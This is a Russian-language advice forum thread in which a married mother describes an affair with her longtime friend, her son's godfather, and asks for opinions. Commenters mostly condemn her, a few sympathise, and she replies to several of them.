Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Благодарные родственники
6 минут назад2016-12-05 17:44:53 от Гость
Елена Ройтер, по поводу вашей ситуации с посылками, я думаю, вы правильно сделаете если всё отправлять будите на имя свекрови сестры. Ибо доверять что то сестре, как сами видите, не вариант... Прочитав еще вашу историю в комментариях про отдых на Карпатах не могу не выразить вам свое восхощение! В ... Все комментарии67577
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
Любовь это безумия
сегодня в 06:582016-12-05 06:58:47
Любимый брат мужа
вчера в 21:17:222016-12-04 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Истории о любви - История о моем влечении
Истории о любви : История о моем влечении     

Здравствуйте,уважаемые читатели сайта! Хочу рассказать свою историю и получить совет со стороны....Я замужем уже давно,есть двое детей,муж...Не скажу,что семейная жизнь наша безоблачна...Я сейчас в декретном отпуске,скоро выходить на работу.Второго ребенка очень хотел муж,а я откровенно говоря не хотела,пила таблетки.Так получилось,что я все равно забеременела.Чувства были смешанные сначала,было очень тяжело морально...Я думала даже об аборте,но потом такая чертовщина откровенно говоря началась и сны...и это заставило меня пересмотреть свое решение...Я не смогла пойти на убийство...Я родила,роды были тяжелые в итоге сделали кесарево...Сын родился к тому же в церковный праздник...все это мне казалось таким необычным...Отношения с мужем просто сошли на нет,он старался работать даже по выходным,мало уделял мне и детям времени...отдалялся..Все это привело к депрессии,из которой у меня получилось вылезти каким то чудесным образом...Немного предыстории.Муж мне говорил-хочу второго ребенка,купим новую квартиру,машину,будет работать,если нужно на двух работах...это все был блеф...Еще моя мама отвернулась от меня,ей никогда не нравился мой муж и она сказала,что если я не сделаю аборт,то я ей не дочь...Так и получилось...скоро будет три года как мы не общаемся с мамой....У меня очень и очень тяжелая психологическая обстановка,но я держусь...Но моя история несколько о другом...У меня есть лучший друг-по иронии судьбы одногруппник мужа,буду называть его Андрей...Мы познакомились с ним,когда мне было 16,а ему 18,я в то время уже встречалась с мужем.Андрей как брат мне,мы все время все друг другу рассказали,он о своих проблемах,я о своих...Мы очень близки по духу...это в кратце...Он был на моей свадьбе со моей стороны,он приезжал на выписку старшей дочери...я была на его свадьбе...только он быстро развелся,т.к.его жена загуляла и т.д.Он был в депрессии и первый человек,который узнал о его разводе была я...Отношения брата с сестрой-не больше...Потом постепенно,он стал отдаляться...я переживала,все время думала,как он там себя чувствует,но он по жизни человек одиночка,справляется со своими проблемами сам...Я даже ему не сказала,что забеременела второй раз,он узнал только,когда я позвонила и поздравила его с Днем Рождения...я всегда при любых обстоятельствах помню этот день и спешу поздравить...он был удивлен,что я беременна,но больше ничего мне не сказал...Прошло полгода с момента рождения второго сына и вопрос встал о КРЕЩЕНИИ,выбор крестных.Безусловно,я выбрала его в качестве крестного и он с удовольствием согласился нести эти миссию...Окрестили ,отношения стали налаживаться с Андреем,перезванивались,он ходил к нам в гости...видел всю ситуацию с мужем и мамой давал советы...А я все больше понимала,что я вижу в нем не только друга и крестного...но он держал дистанцию...Как то я осмелилась и пригласила его в кафе,муж остался с детьми и отпустил меня с Андреем,т.к.он доверяет ему на 100%....Андрей в тот вечер говорил,что он чувствовал в молодости ко мне,что не решался открыться,но это все в прошлом,надо думать о детях,а ему устраивать свою личную жизнь,т.к.он не настроен на одноразовые отношения и хочет крепкую семью,да и возраст уже немолодой...Я ничего ему не стала говорить о своих чувствах и мыслях...Настал Новый год,впереди было 10 дней выходных и Андрей пригласил меня к себе в гости...Все начиналось как всегда с разговорах о том,о сем,мы выпивали,готовили вместе еду...И тут я осмелилась его поцеловать...Это было для него неожиданно...но он не отстранил меня...Я сказала,что люблю его...у него вообще был шок...Он человек очень рассудительный,местами хладнокровный...Он сказал,что ему надо время все обдумать,все взвесить...Мы также общались каждый день теперь посредством соцсети на разные темы,но старались не затрагивать эту тему...А я скучала по нему,меня просто накрыло это чувство...но я держала себя в руках...приглашала его на обед,т.к.он работает рядом с домом.где мы живем,но мужу не говорила о его визитах...Февраль...мы договорились встретиться с Андреем,пойти в кафе,он опоздал на встречу,т.к.возникли дела,а я решила прогуляться и не стала сразу идти в кафе...Когда он приехал,он уточнил-куда мы пойдем...он может отвести меня в лес подышать воздухом,можем пойти в кафе,а можем вообще у него остаться и смотреть фильм...выбор был за мной и я выбрала конечно третий вариант...Приехали к нему,приготовили еду,сели смотреть фильм...и тут я опять решила его поцеловать...он ответил мне страстным поцелуем,но потом отстранился и сказал,что как же дальше мы будем жить,если перейдем черту...Я сказала,что разведусь с мужем(я действительно приняла это решение,как только выйду на работу,т.к.устала от постоянных упреков мужа и вспышек агрессии,от его невнимания...)...У нас был секс с Андреем...сейчас мы встречаемся с ним уже в другом амплуа...Андрей очень переживает за всю эту ситуацию...говорит,что ему со мной хорошо,что душа стремиться ко мне,но...дети и тем более муж,с которым он учился и которого он знает уже много лет...он все никак не может свыкнуться с этими мыслями,я его понимаю и не тороплю его с решением....Развод будет с мужем 100%, я не могу так больше,я никогда не испытывала к нему чувств,просто мы пженились в ним в очень тяжелый для меня период развода моих родителей,он оказался рядом,его родители меня поддержали...Это все очень вкратце и м.б.сумбурно написано..Хочется взгляда со стороны,т.к.держу все в себе поделиться не с кем...Спасибо...

63341
Другие Истории о любви
(59)
Manikva
20066 Manikva
Manikva offline
Репутация : 43086
Комментариев 642 11
16 февраля 15:10:19
2016-02-16 15:10:19

{#} немного грустно...

Автор, держитесь! Я считаю, что Вы правильно поступаете. Может быть не совсем честно по отношению к мужу, но это уже другой вопрос.

Ответить
Поддерживаю Да1 / Нет0
Истина дорога лишь тогда, когда доходит до твоего разума твоими же мыслями.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895692
Комментариев 17168 30
16 февраля 15:28:01
2016-02-16 15:28:01

А я вижу ситуацию так, по молодости Вы выскочила замуж, второпях. Захотелось взрослой жизни, получила. А жизнь то взрослая оказалась не столь радужной как хотелось. Ведь быт имеет место быть. Муж вечно на работе, потому что содержать же семью нужно, устаёт. Вот Вы и затосковала, , захотелось новизны отношений и тем более кандидатура подходящая нашлась. Вот Вы и рискнула. При этом придумав себе оправдание, что муж мало внимания уделяет и есть недопонимания. А у кого в семейной жизни нет недопонимания и всё гладко? Ответ - ни у кого. Семейная жизнь - это не сказка. И совсем не так радужно всё, как некоторые от чего то представляют. Семейная жизнь, это в первую очередь работа над отношениями и над собой. Вы видимо просто к ней не готова оказалась, вот и начала искать причины, чтобы оправдать такое своё поведение. Лично я оправданий - не вижу.

Шагаем дальше. И уж совсем позорно с Вашей стороны на данный момент использовать своего мужа, так как пока сама не работаете, а нужно чтобы он содержал. Раз не устраивает Вас Ваш рогатый муж, что тяните? Разводитесь. Раз Андрей такой распрекрасный, то пускай он теперь несёт ответственность за Вас и детей. А то круто пристроились, муж содержит, потому что Вам сейчас так удобно. А Андрей для души.

Круто чё. =)Но при этом муж такой сякой.

Ответить
Поддерживаю Да7 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Автор
Автор

16 февраля 15:28:21
2016-02-16 15:28:21
Manikva, спасибо большое за поддержку, просто все в моей жизни очень и очень сложно....
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

16 февраля 15:56:05
2016-02-16 15:56:05
Блондиночка , спасибо большое за комментарий!Я много упустила в этой истории не хотелось углубляться! Когда я с мужем встречалась, мой папа загулял и решил развестись с мамой!мама у меня человек очень темпераментный, потихоньку стала меня упрекать в том, что папа ушел по моей вине, что я такая неблагодарная и т. п. Как сейчас помню этот день, когда она пришла с очередной неудачной встречи с папой, и избила меня до обморочного состояния, когда я очнулась, то кое как собралась из дома и ушла... Больше я с мамой не стала жить, мне некуда было пойти и я какое то время жила с папой и его новой женой, но потом ее детки стали меня выгонять оттуда и мне пришлось уйти оттуда, устроиться на работу и снимать квартиру, деньги хоть какие то у меня были, т. к. у меня инвалидность... Муж в тот момент очень меня поддерживал спасибо ему... Я не в коем случае не хотела такой взрослой жизни... такова моя судьба... Я забеременила и конечно сыграли свадьбу... Помню на свадьбе свекровь подошла ко мне и сказала: \"Тяжело тебе будет с моим сыном, но ничего справишься... \"Когда родилась дочь, муж стал гулять, пропадать по ночам неизвестно где... уже тогда меня посетили мысли о разводе... я решила наладить с мамой отношения, переехала к ней, подала на развод... но тут мужа как подменили, стал ласковым, нежным и т. д. Я забрала заявление... зря... Вы просто не представляете, что мне приходится терпеть каждый день... он со мной разговаривает на твою м... , срывается по мелочам, орет на детей, вообще не занимается ими... это опять же вкратце... Я бы рада выйти на работу, но наш отдел расформировали и вот 1 марта я пойду писать заявление либо о переводе, либо об увольнении не дай Бог...
Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1665806
Комментариев 6917 36
16 февраля 15:57:50
2016-02-16 15:57:50

Блондиночка , Абсолютно согласна.

Если с мужем 100% разведетесь, так разводитесь, что тянуть? А то такое... мужа не брошу, пусть пока содержит, с Андреем спать буду, потому хочется мне так. Но при этом муж плохой, а вы ужасно несчастная.

Злят меня хитрожопые тетки, которые думают только о себе, и при этом несчастными овечками прикидываются.

Ответить
Поддерживаю Да5 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
16 февраля 16:00:28
2016-02-16 16:00:28

Никому не пожелаешь такого друга как ваш Андрей.

Бедный муж, пригрел на груди такую змеюку.

Я понимаю конечно, пути Господни неисповедимы, но в любых ситуациях прежде всего нужно оставться человеком.

А вы оба хороши, Андрей предал лучшего друга, а вы наставили мужу рогов на ровном месте.

Согласна с Блондиночка , не всегда в жизни все сладко, да гладко. Вы видимо ещё совсем плохой жизни не видели, раз прыгнули в постель к лучшему другу мужа, лишь потому что он перестал вам уделять внимание и отдалился от вас. Да мужик пахать начал в два раза больше, потому что у него прибавление в семействе, а кушать то и одеваться вам всем хочется.

Ответить
Поддерживаю Да2 / Нет0
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
16 февраля 16:04:04
2016-02-16 16:04:04

А Андрей ваш, готов променять лучшего друга на бабу, которая слаба на передок и оставить детей без родного отца!

Извиняюсь, может грубо, но это так и есть.

Аж тошно стало от вашей истории.

Ответить
Поддерживаю Да2 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895692
Комментариев 17168 30
16 февраля 16:07:08
2016-02-16 16:07:08

Автор, так ведь Вы сама себя загнала. Насчёт тяжести жизни. А у кого она лёгкая? У всех людей имеются проблемы. Я вот лично не знаю ни одного человека у котрого бы всё было гладко.

Про мужа. Ок, тяжёлый период был и он подвернулся и т. д. Но в ЗАГС то Вас с ним никто насильно не вёл, а уж тем более никто не заставлял рожать аж двоих детей. Я вообще не понимаю девушек, которые живут с хреновыми мужиками, но при этом спят с ними и рожают от них детей. Где логика вообще?

Далее вижу несостыковки. Вот муж пропадал ночами где-то, Вы решила развестись и тут его как подменили он стал ласков и Вы передумали. А в следующем предложении Вы уже пишите, что Вам многое приходится терпеть от него каждый день. Это тоже как понимать?

В общем вывод один - Вы поторопились с замужеством. И когда появился Андрей сразу муж хреновым стал. а я хочу отметить, хреновые мужья, те что тираны, не отпускают своих жён по кафе с другими мужиками, пускай даже друзьями. Вы что то темните, как по мне. Или утрируете.

Ответить
Поддерживаю Да5 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка offline
Репутация : 94038
Комментариев 697 1
16 февраля 16:51:24
2016-02-16 16:51:24

Мне тоже противно стало от истории. На месте вашего мужа я бы вам детей не отдала, ибо нефиг с чужими мужиками по кафе да квартирам ошиваться и ахаться.

Ответить
Поддерживаю Да2 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249285
Комментариев 8863 0
16 февраля 17:27:06
2016-02-16 17:27:06

говорит, что ему со мной хорошо, что душа стремиться ко мне, но... дети и тем более муж, скажите, автор, я правильно поняла, что Андрей не хочет жениться, причины: дети и, естественно, предательство вашего мужа, его друга?

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Автор
Автор

16 февраля 17:35:38
2016-02-16 17:35:38
Сиреневая Кошка, спасибо большое за комментарий... я не намерена ругаться... упустила я очень много в своей истории. Желаю вам не стать одной из житрожопых теток...
Ответить
Поддерживаю Да0 / Нет0
Магдалина
Магдалина

16 февраля 17:35:48
2016-02-16 17:35:48
Плохо вы поступает, автор. Живите в своей семье, Вас на лево потянуло.. , детям нужен родной отец, оставьте в покое Вашего кума, не ломайте дров, Вы не улучшите, а ухудшите свою жизнь
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

16 февраля 17:36:05
2016-02-16 17:36:05

Уважаемый Автор, ситуация мягко говоря сложная и неприятная. Конечно было бы намного легче пойти на адюльтер, если бы вы были с мужем в браке без детей, не так было бы совестливо. Но у вас случай с детьми. Вы мама и для детей вы самый главный человек, не забывайте об этом. Понятно, что сейчас вы "опьянены" Андреем и у вас бабочки в животе, но вы уже не девочка-подросток, а прежде всего мама с детьми. Осуждать вас и учить морали - лишее. Уверен, что человек вы нелохой, просто гормоны и любовь почти всегда берут своё, да и всей ситуации в буквах вы нам передать не можете. Особенно атмосферу, которая царит между вами с мужем. Если вы уже убеждены, что будет развод, то тогда запасайтесь терпением - процесс неприятный, реакция мужа может быть разнообразной. Вам нужно всё равно как-то будет дипломатично расстаться и поддерживать отношения ради детей, они должны пострадать меньше всего. Они тут не при чём. А если у Андрея есть тестикулы ещё между ног, то пусть он и ваших детей примет. Стройте новую семью заново. Правильно, что выговорилсь и не держите в себе. Стальных нервов вам и удачи. Любовь у вас уже есть.

Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

16 февраля 17:46:25
2016-02-16 17:46:25

Автор, я нельзя было все это кратко пересказать?, такое ощущение что не за мнением пришли а поделиться просто своим романом{#}

Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
16 февраля 20:42:40
2016-02-16 20:42:40

А я Вас понимаю. Вы , на мой взгляд. не от слабости на передок, а от нехватки мужской любви завяли с Андреем близкие отношения. Когда я жила с мужем, я любила совсем друго человека и именно когда забеременнела, поняла насколько он мне нужен, потому как понимала, что теперь он потерян для меня навсегда.... И я не пыталась вернутью хотя уверена. у меня была возможность. Да, если муж узнает о вашем романе, это будет скандал. И ситуация будет выглядеть именно так, что его предала жена с другом. Раз решили - разводитесь. Нет смысла тянуть. В Вашем случае это не чистоплотно. Хоть то не мужа друг, а Ваш. ВЫ привели его в семью. Но это мало меняет. А что планирует иметь с вами в будущем Андрей? Будет ли он с вами?

Не могу Вас осуждать. Ибо сама далеко не безгрешна. Знаю, что если бы тот человек, которого я любила сделал тогда шаги в мою сторону, я бы тоже изменила мужу. Причем с удовольствием. Потому что у меня, как и вас не было к мужу ни любви, ни чувства благодарности, а только чувство долга перед ребенком.....

Ответить
Поддерживаю Да5 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Маргаритка
Маргаритка

16 февраля 21:06:55
2016-02-16 21:06:55
Думаю, если предложите Андрею жениться на вас его если не ветром сдует, так отговорки начнутся дети, муж и т. д, да почему начнутся они уже явно есть!Думаю, что Андрею не нужны чужие дети, да ещё двое, да еще его друга, да еще и будучи не женатым!Мне кажется, Андрей поостынет, и начнёт жизнь с чистого листа, с женщиной без прошлого!Ну а вы не унывайте, жить в унижениях тоже не выход, думаю, встретите еще человека себе под стать!
Ответить
Поддерживаю Да1 / Нет0
Автор
Автор

16 февраля 21:07:14
2016-02-16 21:07:14
Monica, Он мой лучший друг, а не мужа и работает он обычным инженером на одной работе на маленькую з/п и даже не пытается искать другую работу...
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

16 февраля 21:07:25
2016-02-16 21:07:25
Злая Сибирячка, дети останутся со мной, т. к. они ему не нужны!
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

16 февраля 21:07:27
2016-02-16 21:07:27
Elwood, спасибо большое за комментарий!
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

16 февраля 21:07:36
2016-02-16 21:07:36
БесШаБаШнЫй ЭлЬф )), извините что заставила читать такое длинное повествование, если бы я хотела бы описать свой роман, то я бы добавила красок...
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

16 февраля 21:07:40
2016-02-16 21:07:40
Violetta, да он не хочет быть причиной развода, да и у меня есть другие причины для разрыва уже давно
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

16 февраля 21:36:30
2016-02-16 21:36:30

Автор, представляю...{#}я этот еле осилил, можно было местами упустить страстные поцелуи...{#}

Так, вот что я вам скажу... Я взял вашу историю... и опустил в тазик с водой, и что я там увидел...{#}Андрейка ваш, не любит вас, угрызения совести у него, от того что хочет смыться красиво... иначе он ваше не заводил бы романов с вами, короче возвращайтесь к мужу, {#}какой ни есть родня! Иначе не легко вам будет одной с двумя маленькими детьми... подумайте над тем что я сказал.. Не игнорируете {#}

Ответить
Поддерживаю Да2 / Нет0
 Р’ Р’ Р’В Р РвЂ
 Р’ Р’ Р’В Р РвЂ

16 февраля 22:23:25
2016-02-16 22:23:25
Странная_Такая , я пока не могу сказать, как сложаться наши дальнейшие отношения с Андреем, т. к. мало времени прошло с того момента как мы стали близки... Да, я никогда и подумать не могла, что окажусь в такой ситуации, у меня это впервые, никогда не ходила налево...
Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
16 февраля 22:31:02
2016-02-16 22:31:02

 Р’ Р’ Р’В Р РвЂ, Ну что ж... Что сделано, то сделано. желаю Вам в нем не разочароваться, что б потом не грызть локти. Удачи.

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

16 февраля 22:36:59
2016-02-16 22:36:59

Странная_Такая , что за ник у нее такой?{#} это уже не добрый знак....

Ответить
Поддерживаю Да0 / Нет0
 Р’ Р’ Р’В Р РвЂ
 Р’ Р’ Р’В Р РвЂ

16 февраля 22:45:09
2016-02-16 22:45:09
БесШаБаШнЫй ЭлЬф )), я с телефона пишу, поэтому как то так...
Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
16 февраля 22:48:10
2016-02-16 22:48:10

БесШаБаШнЫй ЭлЬф )){#}Это заклинания, превращающие бесшабашных ээльфов в степенных и мудрых........

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка offline
Репутация : 94038
Комментариев 697 1
17 февраля 05:15:26
2016-02-17 05:15:26

Автор, так дети и вам то не особо нужны! Раз находите время (а вы в декрете) жахается с мужиками!

Ответить
Поддерживаю Да1 / Нет0
Кристиша
Кристиша

17 февраля 11:10:04
2016-02-17 11:10:04
Автор, у вас двое маленьких детей и вы успеваете и трахацо и по кафе мотаться и мужиков присматривать?? Вы вообще детьми занимаетесь? Вы зачем их родили?Муж уговорил) а прыгнуть с 9 этажа тоже можно уговорить вас? Рожать от говна, а послушав вас, ваш муд говно, это как? Зачем? Зачем жить с ним, рожать, обхаживать, спать? На друга переметнулись лихо.. причем сами залезли на него, сами целовали.. бесстыдство какое-то. Я бы со стыда сгорела самой лезть. Ваши дети никому не нужны. А вы блудная гулящая баба.
Ответить
Поддерживаю Да1 / Нет0
Автор
Автор

17 февраля 11:10:57
2016-02-17 11:10:57
Злая Сибирячка, никак не могу понять за долгое прибывание на этом сайте-почему некоторые личности вроде вас на основании историй делают такие выводы?Вы как-будто в курсе всего происходящего в жизни автора истории?Во-первых, где вы прочли, что я ЖАХАЮСЬ С МУЖИКАМИ?Речь идет только об одном мужчине... Во-вторых, откуда такие выводы о том, что дети мне не нужны?Были бы не нужны, их бы и не было в помине. А я вам могу сказать, что у меня было только две беременности и как результат двое детей. Дети во мне души не чают, т. к. я все время провожу с ними, интересуюсь проблемами старшей дочери и всегда спешу ей на помощь в трудных ситуациях... Не считаю нужным больше оправдываться...
Ответить
Поддерживаю Да1 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
17 февраля 12:17:56
2016-02-17 12:17:56

Ну я тоже считаю, что женщине не стоит ставить на себе крест, если у нее родились дети. Я не говорю, что нужно бегать по мужикам. И автор не ходила по барам цеплять мужиков в ущерб проведению времени с детьми, у нее сложились так обстоятельства, что человек, с которым у нее возникли чувства был рядом и вхож в ее семью..... Так бывает. Не все мы идеальны. Не все мы можем устоять и не поддаться чувствам.

Если бы автор познакомилась с этим человеком на данный момен (например на сайте знакомств) то есть, искала бы кандидатов в любовникки, история выглядела бы иначе. Все мы живые люди. И иногда нюансы очень много чего меняют.

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Автор
Автор

17 февраля 13:02:27
2016-02-17 13:02:27
Кристиша, не суди, да не судим будешь!Спасибо за комментарий, читайте комментарий мой ниже вашего, это также относится к вам!
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

17 февраля 13:02:39
2016-02-17 13:02:39
Странная_Такая , спасибо большое... я еще раз повторюсь, что это у меня впервые, даже если с Андреем у нас ничего не выйдет, я просто останусь с детьми, я все для себя решила... А Андрей это не просто человек, с которым у нас связь, он всегда был частичкой моей души... Для него не легко было сделать этот шаг, он всегда считал меня сестрой... каюсь в своих греховных мыслях, но все , что Бог не делает все к лучшему!Еще раз спасибо за поддержку!
Ответить
Поддерживаю Да0 / Нет0
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка offline
Репутация : 94038
Комментариев 697 1
17 февраля 13:38:59
2016-02-17 13:38:59

Странная_Такая , я не говорю про то, что нужно ставить крест на себе. Я говорю про то, что автор, не разобравшись до конца с мужем, стала уже бывать в постели у другого мужчины. И неважно друг это, враг, или просто так. Пусть разводится, а там делает че хочет.

Я сама в декрете и у меня нет времени ни на кого другого, кроме мужа и детей.

Ответить
Поддерживаю Да0 / Нет0
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 898 15
17 февраля 15:11:05
2016-02-17 15:11:05

Говорить что автор хитрожапая эгоистка и т. д. я не буду, но то что она обманывает мужа в своих целях чести ей явно не делает.
Жизнь порой так безжалостна, что от происходящих в ней событий можно сойти с ума.

Вам, автор, другого совета, кроме как рассказать обо всём мужу нет. Искренне и откровенно поговорить и сказать о вашем решении развестись. Только не нужно его винить. В вашей сложившейся жизненной ситуации вы можете винить только себя. Вы сами сказали что с самого начала не имели никаких чувств к этому мужчине. Это уже с самого начала врынье прежде всего самой себе. А мужчины, по своей природе, всегда будут отдаляться от женщины которая к нему равнодушна, даже если есть детки.
На счет постели... Я лично воспитана так, что будучи в браке я не изменю никогда, даже пусть я буду любить другого до потери пульса. Это подло. Как можно скорее расскажите всё мужу.

А отношение с мамой. Это тоже следствие ваших собственных действий. У меня немного схожая была ситуация из-за мужа. Но мне хватило пол года молчания. Я очень переживала за родителей. За маму. Это единственный человек, который примет своё дитя в любой момент. И говорить что мама отвернулась.. она хотела лучшего будущего вам, именно поэтому так вам и сказала. Но винить кровного человека, благодаря которому Вы научились ходить , говорить, и являетесь тем, кем Вы есть - громаднейшая ошибка. Мужчины были и будут всегда.. а вот родители - не вечны. Задумайтесь, вы взрослый человек. Жизнь ваша и каждый создает свою судьбу.

Ответить
Поддерживаю Да2 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Автор
Автор

17 февраля 15:32:03
2016-02-17 15:32:03
Lilianka, спасибо за комментарий, я еще раз повторюсь, что написала очень сжато все... мама это отдельная и очень тяжелая история, а то что я прыгнула раньше времени в другую постель, это мое решение!
Ответить
Поддерживаю Да0 / Нет0
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 898 15
17 февраля 15:40:24
2016-02-17 15:40:24

Автор, Совершенно верно - ваше решение, но как бы вы отреагировали на то, что ваш муж переспал с вашей подругой и уходит к ней?
Прежде чем принимать любые решения, неплохо было бы, как минимум, поставить себя на место человека, подлость к которому совершаешь. Разве не так?

Ответить
Поддерживаю Да1 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Автор
Автор

17 февраля 15:49:48
2016-02-17 15:49:48
Lilianka, у нас была уже такая ситуация, конечно я переживала...
Ответить
Поддерживаю Да0 / Нет0
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 898 15
17 февраля 15:59:39
2016-02-17 15:59:39

Автор, Ну вот. Вот только с определением "переживание" я не согласна. Муж ваш будет чувствовать не переживание, а боль и предательство, эти чувства разрушительны.. они выжигают внутри души всё живое. Порой такие люди и остаются одинокими после таких ситуаций.

В общем, более всего, по-человечески обидно за мужа вашего. Мне его очень жаль - ведь он рядом, несмотря на то, что вы так жестоко холодны к нему всю сознательную жизнь, а теперь еще и спите с другом..

Удачи!

Ответить
Поддерживаю Да1 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Милая кошка
10885 Милая кошка
Милая кошка offline
Репутация : 586331
Комментариев 7737 13
17 февраля 19:37:24
2016-02-17 19:37:24

Скажу прямо, таких дамочек как вы презираю и все эти сопли вам подобных про любовь просто омерзительны. Почему вы не думали , когда замуж выходили , что мужа не любите?Человек пашет без выходных, дабы вас с детьми обеспечить, а вы тем временем с его другом кувыркаетесь. конечно муж не может вам уделять время, ведь он устает. Отправить бы вас на работу пахать , и потяжелее, не было бы сил на так называемую любовь на стороне. Распанькал вас муж. да и мать вы хреновая, раз хватает время, имея двоих детей маленький, с Андреем развлекаться. А таких друзей как Андрей этот врагу не пожелаешь!после прочтения истории, понимаю, как люди совершают убийства в состоянии аффекта. На месте вашего мужа, узнай я правду, прибила бы обоих.

Ответить
Поддерживаю Да1 / Нет0
Если я тебе не нравлюсь-застрелись! Я не исправлюсь.
Автор
Автор

17 февраля 21:07:05
2016-02-17 21:07:05
Lilianka, спасибо!
Ответить
Поддерживаю Да0 / Нет0
Наоборот86
Наоборот86

17 февраля 21:07:57
2016-02-17 21:07:57
Рада Рай - Душа моя....
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

18 февраля 09:47:15
2016-02-18 09:47:15
Милая кошка, спасибо за комментарий!Муж не пашет без выходных, а работает обычным инженером на мизерную з/п, просто, чтобы не сидеть с детьми он выходит в субботу на работу... с другом как вы пишите кувыркаемся не часто... у мужа не такая тяжелая работа, чтобы уставать... я работаю с людьми и поверьте это очень тяжело(не буду говорить кем и где)... дочь не такая и маленькая, её 16 лет... в любой ситуации есть выход, не вижу смысла кого то убивать... муж тоже в свое время гулял, да еще как... так что все мы не без греха...
Ответить
Поддерживаю Да0 / Нет0
белая мышка
9141 белая мышка
Белая мышка online
Репутация : 141390
Комментариев 1509 25
18 февраля 12:48:26
2016-02-18 12:48:26

Автор, после прочтения истории, конечно же хочется Вас осудить и прочитать мораль о верности. Это в идеале... Но поставив себя на Ваше место, могу понять, почему Вас тянет к Андрею. Вам элементарно не хватает теплоты. Вы не видели ее от мамы, папы, мужа. Вот Вас и потянуло к другому мужчине. Вы даже понимаете, что у Вас ничего не получится, но так хочется ласки. Не знаю, как бы я поступила будь на вашем месте, возможно так же.

Видно, что Вы хороший человек, Вы с нежностью пишете о своих детях. Вы их несомненно любите! Даже тут на обидные комментарии всем отвечаете Спасибо. Просто хочется искренне пожелать терпения и простого женского счастья! И правильно делаете что хотите разводиться!

Ответить
Поддерживаю Да4 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
18 февраля 15:24:48
2016-02-18 15:24:48

белая мышка, Поддерживаю Вас 100%.... )

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Автор
Автор

18 февраля 19:13:47
2016-02-18 19:13:47
белая мышка, Большое спасибо Вам за теплые слова и поддержку! Да, действительно я очень мягкий человек с доброй душой... и иногда даже страдаю от этого, а поделать ничего с этим не могу... Случилось так, как случилось, я очень переживаю сейчас, начались проблемы со сном, пытаюсь отвлечься от тяжких дум...
Ответить
Поддерживаю Да2 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1665806
Комментариев 6917 36
19 февраля 14:17:21
2016-02-19 14:17:21

белая мышка, А я не поддерживаю.

Я понимаю, как это не хватает тепла, понимаю, как можно разлюбить одного и полюбить другого. Понимаю, как можно влюбиться и при этом быть хорошей матерью (в этом вообще не поддерживаю возмущений комментаторов, по-моему, одно другого никак не касается). Я даже понимаю, когда любят любовника, но от мужа уйти не могут, потому что тоже любят, когда есть какие-то эмоции, когда человеку сложно принять решение... я это все могу понять.

